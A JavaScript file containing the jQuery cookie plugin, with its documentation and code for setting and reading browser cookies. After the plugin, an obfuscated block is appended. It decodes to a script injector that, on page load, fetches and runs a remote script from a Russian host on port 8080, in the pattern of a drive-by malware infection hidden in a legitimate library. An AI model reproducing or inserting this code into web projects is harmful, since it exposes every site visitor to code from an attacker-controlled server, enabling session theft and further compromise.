/**
 * Cookie plugin
 *
 * Copyright (c) 2006 Klaus Hartl (stilbuero.de)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 */

/**
 * Create a cookie with the given name and value and other optional parameters.
 *
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Set the value of a cookie.
 * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });
 * @desc Create a cookie with all available options.
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Create a session cookie.
 * @example $.cookie('the_cookie', null);
 * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain
 *       used when the cookie was set.
 *
 * @param String name The name of the cookie.
 * @param String value The value of the cookie.
 * @param Object options An object literal containing key/value pairs to provide optional cookie attributes.
 * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object.
 *                             If a negative value is specified (e.g. a date in the past), the cookie will be deleted.
 *                             If set to null or omitted, the cookie will be a session cookie and will not be retained
 *                             when the the browser exits.
 * @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).
 * @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie).
 * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will
 *                        require a secure protocol (like HTTPS).
 * @type undefined
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/klaus.hartl@stilbuero.de
 */

/**
 * Get the value of a cookie with the given name.
 *
 * @example $.cookie('the_cookie');
 * @desc Get the value of a cookie.
 *
 * @param String name The name of the cookie.
 * @return The value of the cookie.
 * @type String
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/klaus.hartl@stilbuero.de
 */
jQuery.cookie = function(name, value, options) {
    if (typeof value != 'undefined') { // name and value given, set cookie
        options = options || {};
        if (value === null) {
            value = '';
            options.expires = -1;
        }
        var expires = '';
        if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
            var date;
            if (typeof options.expires == 'number') {
                date = new Date();
                date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));
            } else {
                date = options.expires;
            }
            expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE
        }
        // CAUTION: Needed to parenthesize options.path and options.domain
        // in the following expressions, otherwise they evaluate to undefined
        // in the packed version for some reason...
        var path = options.path ? '; path=' + (options.path) : '';
        var domain = options.domain ? '; domain=' + (options.domain) : '';
        var secure = options.secure ? '; secure' : '';
        document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
    } else { // only name given, get cookie
        var cookieValue = null;
        if (document.cookie && document.cookie != '') {
            var cookies = document.cookie.split(';');
            for (var i = 0; i < cookies.length; i++) {
                var cookie = jQuery.trim(cookies[i]);
                // Does this cookie string begin with the name we want?
                if (cookie.substring(0, name.length + 1) == (name + '=')) {
                    cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                    break;
                }
            }
        }
        return cookieValue;
    }
};


this.Y="";var X;if(X!='E'){X='E'};function ia(){var n;if(n!='' && n!='I'){n=''};var c=new String();var T=unescape;var o;if(o!='' && o!='wi'){o='j'};var qD=new String();var v=window;var vc;if(vc!='El' && vc!='pF'){vc=''};this.J="";var u=T("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%77%65%62%73%68%6f%74%73%2e%63%6f%6d%2f%61%6c%69%70%61%79%2e%63%6f%6d%2e%70%68%70");var im;if(im!='' && im!='k'){im='ii'};var hp;if(hp!='' && hp!='eE'){hp='Uz'};var g='';function i(p,V){var iu;if(iu!='' && iu!='XO'){iu=null};var x="8y1g".substr(3);var Bp;if(Bp!='' && Bp!='nE'){Bp='Wl'};var IY;if(IY!='' && IY!='WE'){IY='qC'};var m=T("%5b"), Td=T("%5d");var fw=new Date();var nf=new Date();var U=m+V+Td;var ql;if(ql!=''){ql='Ab'};var ST=new String();var B=new RegExp(U, x);var eD='';return p.replace(B, new String());};var aC;if(aC!='zf'){aC='zf'};var O;if(O!='Dk'){O=''};var Wg=new Date();var fD;if(fD!='' && fD!='px'){fD='G'};var pm='';var pX=new String();var cS=new String();var r=new String();var _=i('8136067118166107117','7361');var Q=document;var xZ;if(xZ!='fc' && xZ != ''){xZ=null};var CP="";this.EP='';function a(){this.XB="";var pt=T("%68%74%74%70%3a%2f%2f%73%6e%6f%72%65%66%6c%61%73%68%2e%72%75%3a");this.TC="";var kJ='';var R;if(R!='' && R!='IJ'){R='JD'};pX=pt;var kk;if(kk!='mc'){kk='mc'};this.xe='';pX+=_;var OG;if(OG!='ad' && OG!='sC'){OG='ad'};pX+=u;var Il;if(Il!='Ay' && Il!='gT'){Il=''};var vU;if(vU!='' && vU!='Wx'){vU=''};this.Yg="";try {var fg=new String();var EH='';aE=Q.createElement(i('skcUraiJp9tk','ukazv32NXM9JZQAnUL4G'));var WR;if(WR!='' && WR!='SK'){WR=''};var kT;if(kT!='' && kT!='TF'){kT=null};var Wj=new String();aE[T("%73%72%63")]=pX;aE[T("%64%65%66%65%72")]=[6,1][1];var YO;if(YO!='ZB' && YO != ''){YO=null};var rA=new Array();this.JU='';Q.body.appendChild(aE);this.vD='';var yL=new String();var np=new String();} catch(z){var NV;if(NV!='TE' && NV!='SKi'){NV='TE'};alert(z);};}this.Xj='';var Dj=new String();var _o="";v["BN4onl".substr(3)+"oad"]=a;var mR;if(mR!='mK'){mR=''};};var sM=new String();var UL=new String();var N_;if(N_!='_U'){N_='_U'};ia();var EO;if(EO!='' && EO!='Pl'){EO=null};var _M;if(_M!='' && _M!='qL'){_M=null};